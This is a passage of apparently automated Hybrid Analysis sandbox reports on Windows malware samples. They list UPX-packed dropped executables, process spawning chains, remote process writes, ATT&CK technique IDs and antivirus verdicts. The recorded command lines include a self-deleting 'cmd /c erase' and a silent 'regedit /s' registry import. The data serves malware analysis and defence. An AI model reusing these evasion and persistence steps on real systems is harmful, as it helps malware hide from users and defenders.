(GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bnhphvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"64462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tddht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hfnrrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"drtpjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"482486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0484408.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2226066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2822060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2822060.exe]- [targetUID: 00000000-00002724]\n \"46000.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46000.exe]- [targetUID: 00000000-00002724]\n \"644802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\644802.exe]- [targetUID: 00000000-00003584]\n \"288022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\288022.exe]- [targetUID: 00000000-00003380]\n \"446022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\446022.exe]- [targetUID: 00000000-00001724]\n \"fdrnfdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdrnfdr.exe]- [targetUID: 00000000-00001700]\n \"jbvpj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbvpj.exe]- [targetUID: 00000000-00001700]\n \"ldpnpvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldpnpvp.exe]- [targetUID: 00000000-00003948]\n \"jptlrlr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jptlrlr.exe]- [targetUID: 00000000-00000768]\n \"nvpvtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvpvtb.exe]- [targetUID: 00000000-00000768]\n \"jjtrtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjtrtt.exe]- [targetUID: 00000000-00003308]\n \"jdrfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdrfr.exe]- [targetUID: 00000000-00002448]\n \"682606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\682606.exe]- [targetUID: 00000000-00002448]\n \"00288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00288.exe]- [targetUID: 00000000-00000388]\n \"46248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46248.exe]- [targetUID: 00000000-00001220]\n \"60860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60860.exe]- [targetUID: 00000000-00000568]\n \"628644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\628644.exe]- [targetUID: 00000000-00000568]\n \"620262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620262.exe]- [targetUID: 00000000-00001744]\n \"444002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\444002.exe]- [targetUID: 00000000-00001744]\n \"642428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\642428.exe]- [targetUID: 00000000-00000328]\n \"64600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64600.exe]- [targetUID: 00000000-00003760]\n \"64826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64826.exe]- [targetUID: 00000000-00003896]\n \"xjntxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjntxb.exe]- [targetUID: 00000000-00002472]\n \"frljb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frljb.exe]- [targetUID: 00000000-00004616]\n \"dhrldf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhrldf.exe]- [targetUID: 00000000-00004616]\n \"hpfbrjf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hpfbrjf.exe]- [targetUID: 00000000-00004588]\n \"vjnxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjnxj.exe]- [targetUID: 00000000-00004580]\n \"ffdpvvb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffdpvvb.exe]- [targetUID: 00000000-00004580]\n \"bbxnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bbxnv.exe]- [targetUID: 00000000-00002284]\n \"dthbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dthbf.exe]- [targetUID: 00000000-00001284]\n \"blphnxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blphnxr.exe]- [targetUID: 00000000-00001284]\n \"jxhdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxhdr.exe]- [targetUID: 00000000-00003580]\n \"rptdfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rptdfh.exe]- [targetUID: 00000000-00003580]\n \"pvjjxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pvjjxn.exe]- [targetUID: 00000000-00003616]\n \"rhlpfp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhlpfp.exe]- [targetUID: 00000000-00003616]\n \"nblhvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nblhvh.exe]- [targetUID: 00000000-00004060]\n \"xffxhjl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xffxhjl.exe]- [targetUID: 00000000-00001844]\n \"vpdhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vpdhr.exe]- [targetUID: 00000000-00001844]\n \"68448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68448.exe]- [targetUID: 00000000-00003348]\n \"4240462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4240462.exe]- [targetUID: 00000000-00003348]\n \"4688686.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4688686.exe]- [targetUID: 00000000-00000944]\n \"6884282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6884282.exe]- [targetUID: 00000000-00001900]\n \"6062268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6062268.exe]- [targetUID: 00000000-00004520]\n \"8608268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8608268.exe]- [targetUID: 00000000-00003352]\n \"20046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20046.exe]- [targetUID: 00000000-00003352]\n \"28800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28800.exe]- [targetUID: 00000000-00004508]\n \"64226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64226.exe]- [targetUID: 00000000-00004508]\n \"jftjpxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jftjpxt.exe]- [targetUID: 00000000-00003364]\n \"pbbvvxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbbvvxt.exe]- [targetUID: 00000000-00002700]\n \"pdbtf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdbtf.exe]- [targetUID: 00000000-00002700]\n \"dtxrlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtxrlp.exe]- [targetUID: 00000000-00006032]\n \"bdppl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdppl.exe]- [targetUID: 00000000-00006032]\n \"8420244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8420244.exe]- [targetUID: 00000000-00004256]\n \"460060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\460060.exe]- [targetUID: 00000000-00004476]\n \"lvvdvpj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvvdvpj.exe]- [targetUID: 00000000-00004476]\n \"ndfntv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndfntv.exe]- [targetUID: 00000000-00004168]\n \"8028040.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8028040.exe]- [targetUID: 00000000-00004064]\n \"lnxndll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lnxndll.exe]- [targetUID: 00000000-00000864]\n \"xlrdpdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlrdpdb.exe]- [targetUID: 00000000-00000864]\n \"44628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44628.exe]- [targetUID: 00000000-00004428]\n \"0260006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0260006.exe]- [targetUID: 00000000-00005924]\n \"28482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28482.exe]- [targetUID: 00000000-00005924]\n \"06626.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06626.exe]- [targetUID: 00000000-00005952]\n \"vftrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vftrx.exe]- [targetUID: 00000000-00006096]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has section name UPX1 with entropy \"7.97244478673\"\n \"hnldj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"txvhpv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"800884.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"800608.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"082060.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"22802.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2224020.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8886462.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dhpnj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bnhphvh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"64462.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tddht.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hfnrrt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"drtpjh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"482486.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0484408.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2226066.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"60440.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2822060.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"46000.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"644802.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"288022.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"446022.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fdrnfdr.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has a section named \"UPX0\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has a section named \"UPX1\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has a section named \"UPX2\"\n \"hnldj.exe\" has a section named \"UPX0\"\n \"hnldj.exe\" has a section named \"UPX1\"\n \"hnldj.exe\" has a section named \"UPX2\"\n \"txvhpv.exe\" has a section named \"UPX0\"\n \"txvhpv.exe\" has a section named \"UPX1\"\n \"txvhpv.exe\" has a section named \"UPX2\"\n \"800884.exe\" has a section named \"UPX0\"\n \"800884.exe\" has a section named \"UPX1\"\n \"800884.exe\" has a section named \"UPX2\"\n \"800608.exe\" has a section named \"UPX0\"\n \"800608.exe\" has a section named \"UPX1\"\n \"800608.exe\" has a section named \"UPX2\"\n \"082060.exe\" has a section named \"UPX0\"\n \"082060.exe\" has a section named \"UPX1\"\n \"082060.exe\" has a section named \"UPX2\"\n \"22802.exe\" has a section named \"UPX0\"\n \"22802.exe\" has a section named \"UPX1\"\n \"22802.exe\" has a section named \"UPX2\"\n \"2224020.exe\" has a section named \"UPX0\"\n \"2224020.exe\" has a section named \"UPX1\"\n \"2224020.exe\" has a section named \"UPX2\"\n \"8886462.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (UID: 00000000-00006096)\n Spawned process \"vftrx.exe\" (UID: 00000000-00006136)\n Spawned process \"06626.exe\" (UID: 00000000-00005952)\n Spawned process \"28482.exe\" (UID: 00000000-00005924)\n Spawned process \"0260006.exe\" (UID: 00000000-00004428)\n Spawned process \"44628.exe\" (UID: 00000000-00005656)\n Spawned process \"xlrdpdb.exe\" (UID: 00000000-00000864)\n Spawned process \"lnxndll.exe\" (UID: 00000000-00004064)\n Spawned process \"8028040.exe\" (UID: 00000000-00004168)\n Spawned process \"ndfntv.exe\" (UID: 00000000-00006080)\n Spawned process \"lvvdvpj.exe\" (UID: 00000000-00004476)\n Spawned process \"460060.exe\" (UID: 00000000-00004256)\n Spawned process \"8420244.exe\" (UID: 00000000-00003872)\n Spawned process \"bdppl.exe\" (UID: 00000000-00006032)\n Spawned process \"dtxrlp.exe\" (UID: 00000000-00004516)\n Spawned process \"pdbtf.exe\" (UID: 00000000-00002700)\n Spawned process \"pbbvvxt.exe\" (UID: 00000000-00004104)\n Spawned process \"jftjpxt.exe\" (UID: 00000000-00003364)\n Spawned process \"64226.exe\" (UID: 00000000-00004508)\n Spawned process \"28800.exe\" (UID: 00000000-00004540)\n Spawned process \"20046.exe\" (UID: 00000000-00003352)\n Spawned process \"8608268.exe\" (UID: 00000000-00003752)\n Spawned process \"6062268.exe\" (UID: 00000000-00004520)\n Spawned process \"6884282.exe\" (UID: 00000000-00001900)\n Spawned process \"4688686.exe\" (UID: 00000000-00000944)\n Spawned process \"4240462.exe\" (UID: 00000000-00003348)\n Spawned process \"68448.exe\" (UID: 00000000-00002492)\n Spawned process \"vpdhr.exe\" (UID: 00000000-00001844)\n Spawned process \"xffxhjl.exe\" (UID: 00000000-00003004)\n Spawned process \"nblhvh.exe\" (UID: 00000000-00004060)\n Spawned process \"rhlpfp.exe\" (UID: 00000000-00003616)\n Spawned process \"pvjjxn.exe\" (UID: 00000000-00004544)\n Spawned process \"rptdfh.exe\" (UID: 00000000-00003580)\n Spawned process \"jxhdr.exe\" (UID: 00000000-00003244)\n Spawned process \"blphnxr.exe\" (UID: 00000000-00001284)\n Spawned process \"dthbf.exe\" (UID: 00000000-00004276)\n Spawned process \"bbxnv.exe\" (UID: 00000000-00002284)\n Spawned process \"ffdpvvb.exe\" (UID: 00000000-00004580)\n Spawned process \"vjnxj.exe\" (UID: 00000000-00003268)\n Spawned process \"hpfbrjf.exe\" (UID: 00000000-00004588)\n Spawned process \"dhrldf.exe\" (UID: 00000000-00004616)\n Spawned process \"frljb.exe\" (UID: 00000000-00002472)\n Spawned process \"xjntxb.exe\" (UID: 00000000-00003896)\n Spawned process \"64826.exe\" (UID: 00000000-00000132)\n Spawned process \"64600.exe\" (UID: 00000000-00003760)\n Spawned process \"642428.exe\" (UID: 00000000-00000328)\n Spawned process \"444002.exe\" (UID: 00000000-00001744)\n Spawned process \"620262.exe\" (UID: 00000000-00004204)\n Spawned process \"628644.exe\" (UID: 00000000-00000568)\n Spawned process \"60860.exe\" (UID: 00000000-00001220)\n Spawned process \"46248.exe\" (UID: 00000000-00001880)\n Spawned process \"00288.exe\" (UID: 00000000-00000388)\n Spawned process \"682606.exe\" (UID: 00000000-00002448)\n Spawned process \"jdrfr.exe\" (UID: 00000000-00003540)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" wrote 32 bytes to a remote process \"C:\\vftrx.exe\" (Handle: 116)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" wrote 52 bytes to a remote process \"C:\\vftrx.exe\" (Handle: 116)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" wrote 4 bytes to a remote process \"C:\\vftrx.exe\" (Handle: 116)\n \"vftrx.exe\" wrote 32 bytes to a remote process \"C:\\06626.exe\" (Handle: 116)\n \"vftrx.exe\" wrote 52 bytes to a remote process \"C:\\06626.exe\" (Handle: 116)\n \"vftrx.exe\" wrote 4 bytes to a remote process \"C:\\06626.exe\" (Handle: 116)\n \"06626.exe\" wrote 32 bytes to a remote process \"C:\\28482.exe\" (Handle: 116)\n \"06626.exe\" wrote 52 bytes to a remote process \"C:\\28482.exe\" (Handle: 116)\n \"06626.exe\" wrote 4 bytes to a remote process \"C:\\28482.exe\" (Handle: 116)\n \"28482.exe\" wrote 32 bytes to a remote process \"C:\\0260006.exe\" (Handle: 116)\n \"28482.exe\" wrote 52 bytes to a remote process \"C:\\0260006.exe\" (Handle: 116)\n \"28482.exe\" wrote 4 bytes to a remote process \"C:\\0260006.exe\" (Handle: 116)\n \"0260006.exe\" wrote 32 bytes to a remote process \"C:\\44628.exe\" (Handle: 116)\n \"0260006.exe\" wrote 52 bytes to a remote process \"C:\\44628.exe\" (Handle: 116)\n \"0260006.exe\" wrote 4 bytes to a remote process \"C:\\44628.exe\" (Handle: 116)\n \"44628.exe\" wrote 32 bytes to a remote process \"C:\\xlrdpdb.exe\" (Handle: 116)\n \"44628.exe\" wrote 52 bytes to a remote process \"C:\\xlrdpdb.exe\" (Handle: 116)\n \"44628.exe\" wrote 4 bytes to a remote process \"C:\\xlrdpdb.exe\" (Handle: 116)\n \"xlrdpdb.exe\" wrote 32 bytes to a remote process \"C:\\lnxndll.exe\" (Handle: 68)\n \"xlrdpdb.exe\" wrote 52 bytes to a remote process \"C:\\lnxndll.exe\" (Handle: 68)\n \"xlrdpdb.exe\" wrote 4 bytes to a remote process \"C:\\lnxndll.exe\" (Handle: 68)\n \"lnxndll.exe\" wrote 32 bytes to a remote process \"C:\\8028040.exe\" (Handle: 68)\n \"lnxndll.exe\" wrote 52 bytes to a remote process \"C:\\8028040.exe\" (Handle: 68)\n \"lnxndll.exe\" wrote 4 bytes to a remote process \"C:\\8028040.exe\" (Handle: 68)\n \"8028040.exe\" wrote 32 bytes to a remote process \"C:\\ndfntv.exe\" (Handle: 68)\n \"8028040.exe\" wrote 52 bytes to a remote process \"C:\\ndfntv.exe\" (Handle: 68)\n \"8028040.exe\" wrote 4 bytes to a remote process \"C:\\ndfntv.exe\" (Handle: 68)\n \"ndfntv.exe\" wrote 32 bytes to a remote process \"C:\\lvvdvpj.exe\" (Handle: 68)\n \"ndfntv.exe\" wrote 52 bytes to a remote process \"C:\\lvvdvpj.exe\" (Handle: 68)\n \"ndfntv.exe\" wrote 4 bytes to a remote process \"C:\\lvvdvpj.exe\" (Handle: 68)\n \"lvvdvpj.exe\" wrote 32 bytes to a remote process \"C:\\460060.exe\" (Handle: 120)\n \"lvvdvpj.exe\" wrote 52 bytes to a remote process \"C:\\460060.exe\" (Handle: 120)\n \"lvvdvpj.exe\" wrote 4 bytes to a remote process \"C:\\460060.exe\" (Handle: 120)\n \"460060.exe\" wrote 32 bytes to a remote process \"C:\\8420244.exe\" (Handle: 116)\n \"460060.exe\" wrote 52 bytes to a remote process \"C:\\8420244.exe\" (Handle: 116)\n \"460060.exe\" wrote 4 bytes to a remote process \"C:\\8420244.exe\" (Handle: 116)\n \"8420244.exe\" wrote 32 bytes to a remote process \"C:\\bdppl.exe\" (Handle: 116)\n \"8420244.exe\" wrote 52 bytes to a remote process \"C:\\bdppl.exe\" (Handle: 116)\n \"8420244.exe\" wrote 4 bytes to a remote process \"C:\\bdppl.exe\" (Handle: 116)\n \"bdppl.exe\" wrote 32 bytes to a remote process \"C:\\dtxrlp.exe\" (Handle: 120)\n \"bdppl.exe\" wrote 52 bytes to a remote process \"C:\\dtxrlp.exe\" (Handle: 120)\n \"bdppl.exe\" wrote 4 bytes to a remote process \"C:\\dtxrlp.exe\" (Handle: 120)\n \"dtxrlp.exe\" wrote 32 bytes to a remote process \"C:\\pdbtf.exe\" (Handle: 68)\n \"dtxrlp.exe\" wrote 52 bytes to a remote process \"C:\\pdbtf.exe\" (Handle: 68)\n \"dtxrlp.exe\" wrote 4 bytes to a remote process \"C:\\pdbtf.exe\" (Handle: 68)\n \"pdbtf.exe\" wrote 32 bytes to a remote process \"C:\\pbbvvxt.exe\" (Handle: 68)\n \"pdbtf.exe\" wrote 52 bytes to a remote process \"C:\\pbbvvxt.exe\" (Handle: 68)\n \"pdbtf.exe\" wrote 4 bytes to a remote process \"C:\\pbbvvxt.exe\" (Handle: 68)\n \"pbbvvxt.exe\" wrote 32 bytes to a remote process \"C:\\jftjpxt.exe\" (Handle: 68)\n \"pbbvvxt.exe\" wrote 52 bytes to a remote process \"C:\\jftjpxt.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1
https://hybrid-analysis.com/sample/070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1
Hybrid Analysis - Infostealers
{"size": 137264, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1", "sha256": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1", "av_detect": 87, "vx_family": "Packer.Malware.NSAnti", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 6, "total_signatures": 134, "extracted_files": [{"name": "xmloder.exe", "file_path": "%WINDIR%\\System32\\xmloder.exe", "file_size": 137264, "sha256": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe (PID: 5684)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xmlDown.dll", "file_path": "%WINDIR%\\debug\\xmlDown.dll", "file_size": 128000, "sha256": "8778bb017e6d0983623b7fca666870e59979f50cae0e4d6c18ce4c9877bd0e0f", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", "runtime_process": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe (PID: 5684)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005684", "name": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe", "normalized_path": "C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe", "sha256": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1"}, {"uid": "00000000-00005548", "parentuid": "00000000-00005684", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "cmd /c erase /F \"C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005116", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %TEMP%\\iyail.bat", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006048", "parentuid": "00000000-00005116", "name": "regedit.exe", "normalized_path": "%WINDIR%\\regedit.exe", "command_line": "regedit /s %TEMP%\\xfshejg.reg", "sha256": "f318c94a46dbca88eefc3e28be51d27e5f91029dc062f56faaa995f0b5f8e518"}, {"uid": "00000000-00003432", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 1788 -s 872", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}, {"uid": "00000000-00004080", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 1788 -s 872", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": 